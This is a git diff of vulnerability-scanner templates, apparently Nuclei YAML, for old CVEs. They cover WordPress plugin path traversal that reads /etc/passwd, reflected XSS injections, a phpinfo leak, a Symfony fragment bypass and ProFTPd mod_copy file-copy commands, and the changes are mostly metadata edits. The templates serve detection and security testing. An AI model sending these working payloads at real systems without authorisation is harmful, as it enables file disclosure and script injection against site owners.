CVE-2014-4940 - cwe-id: CWE-22 - epss-score: 0.03891 - epss-percentile: 0.90998 - cpe: cpe:2.3:a:tera_charts_plugin_project:tera-charts:0.1:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: tera_charts_plugin_project - product: tera-charts - framework: wordpress - google-query: inurl:"/wp-content/plugins/tera-charts" tags: cve,cve2014,wordpress,wp-plugin,lfi -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd" matchers-condition: and matchers: + - type: regex regex: - "root:.*:0:0:" @@ -42,4 +29,4 @@ http: status: - 200 -# digest: 4a0a0047304502207cfabb76afc34be42d50cb6e83ab3bf5d1b7e8a70f10cd1e1fde6d4a89d2dfcd0221009665fd3be61b1f3846565c5029d19fbf22845e2fdd400713726354127576f78b:922c64590222798bb761d5b6d8e72950 +# Enhanced by mp on 2022/02/24 diff --git a/poc/cve/CVE-2014-4942.yaml b/poc/cve/CVE-2014-4942.yaml index 3bfce6456b..ef0faf2498 100644 --- a/poc/cve/CVE-2014-4942.yaml +++ b/poc/cve/CVE-2014-4942.yaml @@ -1,20 +1,39 @@ id: CVE-2014-4942 + info: - name: WP EasyCart - Information Disclosure + name: WordPress EasyCart <2.0.6 - Information Disclosure author: DhiyaneshDk - severity: low + severity: medium description: | - The EasyCart (wp-easycart) plugin before 2.0.6 for WordPress allows remote attackers to obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function. + WordPress EasyCart plugin before 2.0.6 contains an information disclosure vulnerability. An attacker can obtain configuration information via a direct request to inc/admin/phpinfo.php, which calls the phpinfo function. + remediation: | + Upgrade to WordPress EasyCart version 2.0.6 or later. reference: - https://wpscan.com/vulnerability/64ea4135-eb26-4dea-a13f-f4c1deb77150 - https://codevigilant.com/disclosure/wp-plugin-wp-easycart-information-disclosure - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4942 - https://nvd.nist.gov/vuln/detail/CVE-2014-4942 - tags: cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure -requests: + - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=829290%40wp-easycart&old=827627%40wp-easycart&sfp_email=&sfph_mail= + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N + cvss-score: 5 + cve-id: CVE-2014-4942 + cwe-id: CWE-200 + epss-score: 0.01024 + epss-percentile: 0.82108 + cpe: cpe:2.3:a:levelfourdevelopment:wp-easycart:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: levelfourdevelopment + product: wp-easycart + framework: wordpress + tags: wpscan,cve,cve2014,wordpress,wp-plugin,wp,phpinfo,disclosure + +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php" + matchers-condition: and matchers: - type: word @@ -23,12 +42,15 @@ requests: - "PHP Extension" - "PHP Version" condition: and + - type: status status: - 200 + extractors: - type: regex part: body group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' +# digest: 4b0a004830460221008c1bf333cfd76bc1b8abe4d716b5d045a115773a13bf9c487b70ca6568a5453d022100bcd49d59f04cb8ff2b70044e42c84441763702e1747eabad6a6ceee3797fdd7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2014-9606.yaml b/poc/cve/CVE-2014-9606.yaml index 0dbcbe73af..ab55ff5dbd 100644 --- a/poc/cve/CVE-2014-9606.yaml +++ b/poc/cve/CVE-2014-9606.yaml @@ -1,9 +1,12 @@ id: CVE-2014-9606 + info: name: Netsweeper 4.0.8 - Cross-Site Scripting author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/. + remediation: | + Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9606 @@ -13,23 +16,33 @@ info: cvss-score: 6.1 cve-id: CVE-2014-9606 cwe-id: CWE-79 - tags: cve,cve2014,netsweeper,xss -requests: + epss-score: 0.00102 + epss-percentile: 0.4145 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve2014,netsweeper,xss,packetstorm,cve + +http: - method: GET path: - '{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and matchers: - type: word part: body words: - '' + - type: word part: header words: - text/html + - type: status status: - 200 - -# Enhanced by mp on 2022/02/25 +# digest: 4b0a00483046022100d38dd898ec847c0430b640c24b7c8eb49c1e87ae8c9b02d58ae693f983aa44bf022100a9b9e61e7a20d1689a4e5157073c1f40c71e78658596a4b07179baef41904a41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2014-9609.yaml b/poc/cve/CVE-2014-9609.yaml index 14e19e8e0e..5c93b18125 100644 --- a/poc/cve/CVE-2014-9609.yaml +++ b/poc/cve/CVE-2014-9609.yaml @@ -5,17 +5,27 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in webadmin/reporter/view_server_log.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to list directory contents via a .. (dot dot) in the log parameter in a stats action. + remediation: | + Upgrade to a patched version of Netsweeper or apply the necessary security patches to fix the directory traversal vulnerability. reference: - https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz - https://nvd.nist.gov/vuln/detail/CVE-2014-9609 + - http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.30 + cvss-score: 5.3 cve-id: CVE-2014-9609 cwe-id: CWE-22 - tags: cve,cve2014,netsweeper,lfi + epss-score: 0.00153 + epss-percentile: 0.51516 + cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: netsweeper + product: netsweeper + tags: cve2014,netsweeper,lfi,packetstorm,cve -requests: +http: - method: GET path: - "{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd" @@ -29,5 +39,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/02/25 +# digest: 4a0a00473045022100a029392227a12d3f7540f8228711c6fb2fd02361d9d66b96a82388722893621402200f217f5009814d1ce8b8ded603f0155cb302e0cd2b05ea19f96e58466d748992:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2015-0554.yaml b/poc/cve/CVE-2015-0554.yaml index a812e5fc89..af65820b4d 100644 --- a/poc/cve/CVE-2015-0554.yaml +++ b/poc/cve/CVE-2015-0554.yaml @@ -1,5 +1,4 @@ id: CVE-2015-0554 - info: name: ADB/Pirelli ADSL2/2+ Wireless Router P.DGA4001N - Information Disclosure author: daffainfo @@ -13,12 +12,10 @@ info: classification: cve-id: CVE-2015-0554 tags: cve,cve2015,pirelli,router,disclosure - requests: - method: GET path: - "{{BaseURL}}/wlsecurity.html" - matchers-condition: and matchers: - type: word @@ -28,7 +25,6 @@ requests: - "var WscDevPin" - "var sessionkey" condition: and - - type: status status: - 200 diff --git a/poc/cve/CVE-2015-1880.yaml b/poc/cve/CVE-2015-1880.yaml index 0086f66e71..324c752a09 100644 --- a/poc/cve/CVE-2015-1880.yaml +++ b/poc/cve/CVE-2015-1880.yaml @@ -1,50 +1,31 @@ id: CVE-2015-1880 - info: - name: Fortinet FortiOS <=5.2.3 - Cross-Site Scripting + name: XSS in Fortigates SSL VPN login page author: pikpikcu severity: medium - description: Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. - remediation: | - Upgrade Fortinet FortiOS to a version higher than 5.2.3 to mitigate this vulnerability. + description: Cross-site scripting (XSS) vulnerability in the sslvpn login page in Fortinet FortiOS 5.2.x before 5.2.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. reference: + - https://nvd.nist.gov/vuln/detail/CVE-2015-1880 - https://www.c2.lol/articles/xss-in-fortigates-ssl-vpn-login-page - http://www.fortiguard.com/advisory/FG-IR-15-005/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-1880 - - http://www.securitytracker.com/id/1032261 - - http://www.securitytracker.com/id/1032262 + - http://www.securityfocus.com/bid/74652 classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N - cvss-score: 4.3 cve-id: CVE-2015-1880 - cwe-id: CWE-79 - epss-score: 0.00201 - epss-percentile: 0.5792 - cpe: cpe:2.3:o:fortinet:fortios:5.2.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: fortinet - product: fortios - tags: cve,cve2015,xss,fortigates,intrusive - -http: + tags: cve,cve2015,xss,fortigates,ssl +requests: - method: GET path: - "{{BaseURL}}/remote/login?&err=--%3E%3Cscript%3Ealert('{{randstr}}')%3C/script%3E%3C!--&lang=en" - matchers-condition: and matchers: - type: word - part: body - words: - - - - - type: word - part: header words: - - text/html - + - "" + part: body - type: status status: - 200 -# digest: 4b0a00483046022100a7fc158a503a1219f2db09ae4dfeceb2c792dcca641f60b5d808fb025b4e75d0022100cb02049f449f45b507e2f2be40b9d02b533fad928082a572fd418849e582ccd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - type: word + words: + - "text/html" + part: header diff --git a/poc/cve/CVE-2015-2166.yaml b/poc/cve/CVE-2015-2166.yaml index 34f14e9085..143042641b 100644 --- a/poc/cve/CVE-2015-2166.yaml +++ b/poc/cve/CVE-2015-2166.yaml @@ -3,30 +3,18 @@ id: CVE-2015-2166 info: name: Ericsson Drutt MSDP - Local File Inclusion author: daffainfo - severity: medium + severity: high description: Ericsson Drutt Mobile Service Delivery Platform (MSDP) 4, 5, and 6 allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the default URI in the Instance Monitor. - remediation: | - Apply the latest security patches or updates provided by the vendor to fix the LFI vulnerability in the Ericsson Drutt MSDP application. reference: - https://www.exploit-db.com/exploits/36619 - https://nvd.nist.gov/vuln/detail/CVE-2015-2166 - http://packetstormsecurity.com/files/131233/Ericsson-Drutt-MSDP-Instance-Monitor-Directory-Traversal-File-Access.html - - https://www.exploit-db.com/exploits/36619/ + - http://web.archive.org/web/20210122142229/https://www.securityfocus.com/bid/73901/ classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N - cvss-score: 5 cve-id: CVE-2015-2166 - cwe-id: CWE-22 - epss-score: 0.23272 - epss-percentile: 0.96075 - cpe: cpe:2.3:a:ericsson:drutt_mobile_service_delivery_platform:4.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: ericsson - product: drutt_mobile_service_delivery_platform - tags: cve,cve2015,lfi,ericsson,edb,packetstorm + tags: cve,cve2015,lfi,ericsson -http: +requests: - method: GET path: - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" @@ -41,4 +29,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d59b5607d6615416be4f3aadc82eff16262283d2a6125a49d37667b22d3c35da02202bdded26fca10bd7ddcdd4cfde587e8953f0b45861313b66df6c8d1b8f0725ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# Enhanced by mp on 2022/06/08 diff --git a/poc/cve/CVE-2015-3306.yaml b/poc/cve/CVE-2015-3306.yaml index 10bd304d45..7ac40dbb62 100644 --- a/poc/cve/CVE-2015-3306.yaml +++ b/poc/cve/CVE-2015-3306.yaml @@ -1,48 +1,32 @@ id: CVE-2015-3306 info: - name: ProFTPd - Remote Code Execution + name: ProFTPd RCE author: pdteam - severity: critical - description: ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. - reference: - - https://github.com/t0kx/exploit-CVE-2015-3306 - - https://www.exploit-db.com/exploits/36803/ - - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html - - http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html - - https://nvd.nist.gov/vuln/detail/CVE-2015-3306 - remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later. + severity: high + reference: https://github.com/t0kx/exploit-CVE-2015-3306 + description: The mod_copy module in ProFTPD 1.3.5 allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands. classification: - cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C - cvss-score: 10 cve-id: CVE-2015-3306 - cwe-id: CWE-284 - cpe: cpe:2.3:a:proftpd:proftpd:1.3.5:*:*:*:*:*:*:* - epss-score: 0.97267 - metadata: - max-request: 1 - product: proftpd - vendor: proftpd - tags: cve,cve2015,ftp,rce,network,proftpd,edb -tcp: - - host: - - "{{Hostname}}" - port: 21 - inputs: + tags: cve,cve2015,ftp,rce,network,proftpd + +network: + - inputs: - data: "site cpfr /proc/self/cmdline\r\n" read: 1024 - - data: "site cpto /tmp/.{{randstr}}\r\n" read: 1024 - - data: "site cpfr /tmp/.{{randstr}}\r\n" read: 1024 - - data: "site cpto /var/www/html/{{randstr}}\r\n" + + host: + - "{{Hostname}}" + - "{{Host}}:21" + read-size: 1024 matchers: - type: word part: raw words: - "Copy successful" -# digest: 4a0a0047304502206e4bbacac7407e920b69b12bf1aacc542accbac3da13c2629ef972c3ce196a1f0221009930383e17cc9739da76a80ff0385edeca9954e833de43678ce3e5f6ebb3c02f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2015-4050.yaml b/poc/cve/CVE-2015-4050.yaml index 148993a3f7..a56e9847ee 100644 --- a/poc/cve/CVE-2015-4050.yaml +++ b/poc/cve/CVE-2015-4050.yaml @@ -1,33 +1,16 @@ id: CVE-2015-4050 info: - name: Symfony - Authentication Bypass + name: ESI unauthorized access author: ELSFA7110,meme-lord - severity: medium - description: Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment in the HttpKernel component. - remediation: | - Apply the latest security patches or upgrade to a non-vulnerable version of Symfony. + severity: high + description: FragmentListener in the HttpKernel component in Symfony 2.3.19 through 2.3.28, 2.4.9 through 2.4.10, 2.5.4 through 2.5.11, and 2.6.0 through 2.6.7, when ESI or SSI support enabled, does not check if the _controller attribute is set, which allows remote attackers to bypass URL signing and security rules by including (1) no hash or (2) an invalid hash in a request to /_fragment. + tags: cve,cve2015,symfony,rce reference: - https://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - - http://symfony.com/blog/cve-2015-4050-esi-unauthorized-access - - http://www.debian.org/security/2015/dsa-3276 - https://nvd.nist.gov/vuln/detail/CVE-2015-4050 - - http://lists.fedoraproject.org/pipermail/package-announce/2015-June/159513.html - classification: - cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N - cvss-score: 4.3 - cve-id: CVE-2015-4050 - cwe-id: CWE-284 - epss-score: 0.00847 - epss-percentile: 0.80236 - cpe: cpe:2.3:a:sensiolabs:symfony:2.3.19:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: sensiolabs - product: symfony - tags: cve,cve2015,symfony,rce -http: +requests: - method: GET path: - "{{BaseURL}}/_fragment?_path=_controller=phpcredits&flag=-1" @@ -35,11 +18,10 @@ http: matchers-condition: and matchers: - type: word - part: body words: - "PHP Credits" + part: body - type: status status: - 200 -# digest: 4b0a0048304602210081f82a85652b23ff5cb7c8eb10b4feb081dd997c6da724a991cd0b418810cf19022100f1f997a79929ad657a8ec60cc084d142c5fafe68d3c8880a8a50c8f0671de048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2015-5471.yaml b/poc/cve/CVE-2015-5471.yaml index 151b25e771..37ed1b5e40 100644 --- a/poc/cve/CVE-2015-5471.yaml +++ b/poc/cve/CVE-2015-5471.yaml @@ -1,40 +1,28 @@ id: CVE-2015-5471 - info: name: Swim Team <= v1.44.10777 - Local File Inclusion author: 0x_Akoko severity: medium - description: The program /wp-swimteam/include/user/download.php allows unauthenticated attackers to retrieve arbitrary files from the system. - remediation: Upgrade to Swim Team version 1.45 or newer. + description: The code in ./wp-swimteam/include/user/download.php doesnt sanitize user input from downloading sensitive system files. reference: - https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568 - http://www.vapid.dhs.org/advisory.php?v=134 - https://nvd.nist.gov/vuln/detail/CVE-2015-5471 - - http://packetstormsecurity.com/files/132653/WordPress-WP-SwimTeam-1.44.10777-Arbitrary-File-Download.html - - http://michaelwalsh.org/blog/2015/07/wp-swimteam-v1-45-beta-3-now-available/ + tags: cve,cve2015,wordpress,wp-plugin,lfi classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 + cvss-score: 5.30 cve-id: CVE-2015-5471 cwe-id: CWE-22 - epss-score: 0.08185 - epss-percentile: 0.93681 - cpe: cpe:2.3:a:swim_team_project:swim_team:1.44.10777:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: swim_team_project - product: swim_team - framework: wordpress - google-query: inurl:"/wp-content/plugins/wp-swimteam" - tags: cve,cve2015,wordpress,wp-plugin,lfi,wpscan,packetstorm -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress" matchers-condition: and matchers: + - type: regex regex: - "root:[x*]:0:0" @@ -42,4 +30,3 @@ http: - type: status status: - 200 -# digest: 490a004630440220160c54578ec6aff888716cb92bfc490c74467330aa72d5b20d5575efe59709db0220798fefcb9df2f0868b45964c6869cb83066a899a4cd5624a5ef9acacdb4a796f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2015-6544.yaml b/poc/cve/CVE-2015-6544.yaml index e471c63d3d..23b0e18646 100644 --- a/poc/cve/CVE-2015-6544.yaml +++ b/poc/cve/CVE-2015-6544.yaml @@ -1,33 +1,20 @@ id: CVE-2015-6544 info: - name: Combodo iTop <2.2.0-2459 - Cross-Site Scripting + name: iTop XSS author: pikpikcu severity: medium description: | - Combodo iTop before 2.2.0-2459 contains a cross-site scripting vulnerability in application/dashboard.class.inc.php which allows remote attackers to inject arbitrary web script or HTML via a dashboard title. - remediation: | - Upgrade to a version of Combodo iTop that is equal to or greater than 2.2.0-2459 to mitigate this vulnerability. - reference: - - https://www.htbridge.com/advisory/HTB23268 - - http://sourceforge.net/p/itop/tickets/1114/ - - http://sourceforge.net/p/itop/code/3662/ - - https://nvd.nist.gov/vuln/detail/CVE-2015-6544 + Cross-site scripting (XSS) vulnerability in application/dashboard.class.inc.php in Combodo iTop before 2.2.0-2459 allows remote attackers to inject arbitrary web script or HTML via a dashboard title. + reference: https://nvd.nist.gov/vuln/detail/CVE-2015-6544 + tags: cve,cve2015,xss,itop classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 + cvss-score: 6.10 cve-id: CVE-2015-6544 cwe-id: CWE-79 - epss-score: 0.00284 - epss-percentile: 0.65225 - cpe: cpe:2.3:a:combodo:itop:*:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: combodo - product: itop - tags: cve,cve2015,xss,itop -http: +requests: - method: GET path: - "{{BaseURL}}/pages/ajax.render.php?operation=render_dashboard&dashboard_id=1&layout_class=DashboardLayoutOneCol&title=%%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -35,16 +22,15 @@ http: matchers-condition: and matchers: - type: word - part: body words: - '' + part: body + + - type: status + status: + - 200 - type: word part: header words: - text/html - - - type: status - status: - - 200 -# digest: 490a0046304402207e5cb770ae6ceea5c16f60ae5dfabeb7adfc11cf13392ed8fb070dba9717d08a02207c4cec7e8d3894b7ab0b04b66d8c697000f5d44c0fa9d9fc5fbbd4b09566e4a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2015-7780.yaml b/poc/cve/CVE-2015-7780.yaml index 789c902cf2..4b0f943e88 100644 --- a/poc/cve/CVE-2015-7780.yaml +++ b/poc/cve/CVE-2015-7780.yaml @@ -1,36 +1,51 @@ id: CVE-2015-7780 + info: - name: ManageEngine Firewall Analyzer 8.0 - Directory Traversal + name: ManageEngine Firewall Analyzer <8.0 - Local File Inclusion author: daffainfo severity: medium - description: Directory traversal vulnerability in ManageEngine Firewall Analyzer before 8.0. + description: ManageEngine Firewall Analyzer before 8.0 is vulnerable to local file inclusion. + remediation: | + Upgrade to a version of ManageEngine Firewall Analyzer that is equal to or greater than 8.0 to mitigate this vulnerability. reference: - https://www.exploit-db.com/exploits/35933 - - https://www.cvedetails.com/cve/CVE-2015-7780/ - http://jvndb.jvn.jp/ja/contents/2015/JVNDB-2015-000185.html - http://jvn.jp/en/jp/JVN21968837/index.html + - https://nvd.nist.gov/vuln/detail/CVE-2015-7780 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N cvss-score: 6.5 cve-id: CVE-2015-7780 cwe-id: CWE-22 - tags: cve,cve2015,lfi,manageengine -requests: + epss-score: 0.00151 + epss-percentile: 0.5124 + cpe: cpe:2.3:a:zohocorp:manageengine_firewall_analyzer:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: zohocorp + product: manageengine_firewall_analyzer + tags: manageengine,edb,cve,cve2015,lfi + +http: - method: GET path: - "{{BaseURL}}/fw/mindex.do?url=./WEB-INF/web.xml%3f" + matchers-condition: and matchers: - - type: status - status: - - 200 - type: word + part: body words: - "" - "java.sun.com" - part: body condition: and + - type: word part: header words: - "application/xml" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100a3460c414ae18ac8eff64de9a7ee0cbabf0e078d51e53aa4cb77a997ab0471c6022019cc75eb07d69f3028ccfd527b99829e7841e5af3b8906bbdec67f0d55e6317d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-1000126.yaml b/poc/cve/CVE-2016-1000126.yaml index 7570661517..902c9828d1 100644 --- a/poc/cve/CVE-2016-1000126.yaml +++ b/poc/cve/CVE-2016-1000126.yaml @@ -1,19 +1,33 @@ id: CVE-2016-1000126 info: - name: Admin Font Editor <= 1.8 - Reflected Cross-Site Scripting (XSS) + name: WordPress Admin Font Editor <=1.8 - Cross-Site Scripting author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 - tags: cve,cve2016,wordpress,xss,wp-plugin + description: WordPress Admin Font Editor 1.8 and before contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Update to the latest version of the WordPress Admin Font Editor plugin (1.8 or higher) to fix this vulnerability. + reference: + - http://www.vapidlabs.com/wp/wp_advisory.php?v=526 + - https://wordpress.org/plugins/admin-font-editor + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000126 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2016-1000126 cwe-id: CWE-79 - description: "Reflected XSS in wordpress plugin admin-font-editor v1.8" + epss-score: 0.00119 + epss-percentile: 0.45801 + cpe: cpe:2.3:a:admin-font-editor_project:admin-font-editor:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: admin-font-editor_project + product: admin-font-editor + framework: wordpress + google-query: inurl:"/wp-content/plugins/admin-font-editor" + tags: cve,cve2016,wordpress,xss,wp-plugin -requests: +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" @@ -21,9 +35,9 @@ requests: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -33,3 +47,4 @@ requests: - type: status status: - 200 +# digest: 4a0a00473045022100dabba5cc345af910716530906eccc7ec8597d084a6c713b6dcb3f5774481209502201de0d8704d2fec448eca4c295d9111b6faa7a78091f2f9231364a6c4fac16b08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-1000128.yaml b/poc/cve/CVE-2016-1000128.yaml index 51419b8676..61bfd4d41f 100644 --- a/poc/cve/CVE-2016-1000128.yaml +++ b/poc/cve/CVE-2016-1000128.yaml @@ -1,50 +1,32 @@ id: CVE-2016-1000128 - info: - name: WordPress anti-plagiarism <=3.60 - Cross-Site Scripting + name: anti-plagiarism <= 3.60 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress anti-plagiarism 3.6.0 and prior are vulnerable to reflected cross-site scripting. - remediation: | - Update the WordPress anti-plagiarism plugin to version >3.60 or apply the latest security patches provided by the vendor. + description: Reflected XSS in wordpress plugin anti-plagiarism v3.60 reference: - http://www.vapidlabs.com/wp/wp_advisory.php?v=161 - https://wordpress.org/plugins/anti-plagiarism - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000128 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000128 cwe-id: CWE-79 - epss-score: 0.00142 - epss-percentile: 0.49889 - cpe: cpe:2.3:a:anti-plagiarism_project:anti-plagiarism:*:*:*:*:*:wordpress:*:* - metadata: - max-request: 1 - vendor: anti-plagiarism_project - product: anti-plagiarism - framework: wordpress - google-query: inurl:"/wp-content/plugins/anti-plagiarism" tags: cve,cve2016,wordpress,xss,wp-plugin - -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - matchers-condition: and matchers: - type: word - part: body words: - "" - + part: body - type: word part: header words: - text/html - - type: status status: - 200 -# digest: 490a00463044022054b6a93873f8117ed464b6ee0b2fb2d4b93270219f5e9abbf8a961b8c70b67f502206c156ce0d20ff92dc5677b0c1d726955ec4b4640de551e2afd7d668af5976c00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/CVE-2016-1000132.yaml b/poc/cve/CVE-2016-1000132.yaml index 042fb30874..df36a3068e 100644 --- a/poc/cve/CVE-2016-1000132.yaml +++ b/poc/cve/CVE-2016-1000132.yaml @@ -1,33 +1,25 @@ id: CVE-2016-1000132 info: - name: WordPress enhanced-tooltipglossary 3.2.8 - Cross-Site Scripting + name: enhanced-tooltipglossary v3.2.8 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium - description: WordPress enhanced-tooltipglossary 3.2.8 contains a reflected cross-site scripting vulnerability which allows an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. - remediation: | - Update to the latest version of WordPress enhanced-tooltipglossary plugin (3.2.9 or higher) which includes a fix for this vulnerability. + description: Reflected XSS in wordpress plugin enhanced-tooltipglossary v3.2.8 reference: + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 - http://www.vapidlabs.com/wp/wp_advisory.php?v=37 - https://wordpress.org/plugins/enhanced-tooltipglossary - - https://nvd.nist.gov/vuln/detail/CVE-2016-1000132 + - http://web.archive.org/web/20210123183532/https://www.securityfocus.com/bid/93865/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2016-1000132 cwe-id: CWE-79 - epss-score: 0.00116 - epss-percentile: 0.45205 - cpe: cpe:2.3:a:cminds:tooltip_glossary:*:*:*:*:*:wordpress:*:* metadata: - max-request: 1 - vendor: cminds - product: tooltip_glossary - framework: wordpress google-query: inurl:"/wp-content/plugins/enhanced-tooltipglossary" tags: cve,cve2016,wordpress,xss,wp-plugin -http: +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/enhanced-tooltipglossary/backend/views/admin_importexport.php?itemsnumber=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&msg=imported" @@ -35,9 +27,9 @@ http: matchers-condition: and matchers: - type: word - part: body words: - "" + part: body - type: word part: header @@ -47,4 +39,3 @@ http: - type: status status: - 200 -# digest: 